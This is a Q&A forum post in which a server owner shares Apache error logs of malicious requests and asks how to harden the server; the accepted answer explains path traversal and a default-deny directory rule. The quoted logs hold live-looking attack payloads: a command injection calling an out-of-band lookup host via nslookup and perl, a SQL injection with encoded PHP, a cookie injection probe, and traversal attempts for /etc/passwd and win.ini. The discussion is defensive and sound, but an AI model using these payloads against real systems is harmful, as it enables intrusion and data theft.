# Improving apache2 security

Tags: security, .htaccess, apache2

I have been analyzing my server logs for a week and I found bad intentioned requests, and I want to know if is possible to protect it, because I have no clue about what I should to, the only idea I got is creating an .htaccess rule to block certain words on server requests, like `gethostbyname`, but I dont know how neither if it works

```
[Tue Nov 03 04:14:53.839367 2020] [core:error] [pid 467:tid 140016219035392] (36)File name too long: [client 164.68.125.18:17324] AH00036: access to /;(nslookup hituqvvdoessp277d4.bxss.me||perl -e "gethostbyname('hituqvvdoessp277d4.bxss.me')")|(nslookup hituqvvdoessp277d4.bxss.me||perl -e "gethostbyname('hituqvvdoessp277d4.bxss.me')")&(nslookup hituqvvdoessp277d4.bxss.me||perl -e "gethostbyname('hituqvvdoessp277d4.bxss.me')")/purchase-saq/ failed (filesystem path '/var/www/master/;(nslookup hituqvvdoessp277d4.bxss.me||perl -e "gethostbyname('hituqvvdoessp277d4.bxss.me')")|(nslookup hituqvvdoessp277d4.bxss.me||perl -e "gethostbyname('hituqvvdoessp277d4.bxss.me')")&(nslookup hituqvvdoessp277d4.bxss.me||perl -e "gethostbyname('hituqvvdoessp277d4.bxss.me')")')

[Tue Nov 03 02:08:23.783130 2020] [proxy_fcgi:error] [pid 470:tid 140015933847296] [client 172.28.116.14:44214] AH01071: Got error 'Primary script unknown\n'

[Tue Nov 03 07:10:02.996899 2020] [proxy_fcgi:error] [pid 23788:tid 140014927214336] [client 164.68.112.10:5403] AH01071: Got error 'Primary script unknown\n', referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:3:{s:2:"id";s:3:"'/*";s:3:"num";s:141:"*/ union select 1,0x272F2A,3,4,5,6,7,8,0x7b247b24524345275d3b6469652f2a2a2f286d6435284449524543544f52595f534550415241544f5229293b2f2f7d7d,0--";s:4:"name";s:3:"ads";}554fcae493e564ee0dc75bdf2ebf94ca

[Tue Oct 27 19:58:25.368520 2020] [core:error] [pid 29512:tid 140476501980928] [client 3.132.217.50:33028] AH00126: Invalid URI in request GET <meta%20http-equiv=Set-Cookie%20content=%22testjpjn=6754%22> HTTP/1.1

[Tue Oct 27 19:58:25.030965 2020] [core:error] [pid 29507:tid 140476592264960] [client 3.132.217.50:35560] AH00126: Invalid URI in request GET ..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1

[Tue Oct 27 19:58:20.439013 2020] [core:error] [pid 29652:tid 140476317406976] [client 3.132.217.50:32968] AH00126: Invalid URI in request GET //../../../../../../../../../../../../etc/passwd HTTP/1.1

[Tue Oct 27 22:10:29.240575 2020] [core:error] [pid 29568:tid 140475990255360] [client 3.132.217.74:47570] AH00126: Invalid URI in request GET ../../../../../../../../../../../../winnt/win.ini HTTP/1.1
```

Could you help me please?

Comment: Since all the requests you've posted have generated a "server error" it would seem you are not vulnerable to such requests. Attempting to do anything in `.htaccess` is unlikely to benefit you. In fact, these requests probably "error'd" _before_ reaching `.htaccess` anyway. (?)

Answer (score 2, accepted):

Securing Apache is a large topic. See the section "The A" in [this answer](https://serverfault.com/questions/212269/tips-for-securing-a-lamp-server) for some pointers.

Your last 3 log messages are attempts at path traversal, to read files outside of the web root on your host. [Protect Server Files by Default](https://httpd.apache.org/docs/2.4/misc/security_tips.html#protectserverfiles) in the Apache security docs recommends that you deny access to all files by default:

```
<Directory "/">
  Require all denied
</Directory>
```

then enable access to just the files you want. This is a best practice, that will protect you against path traversal attacks.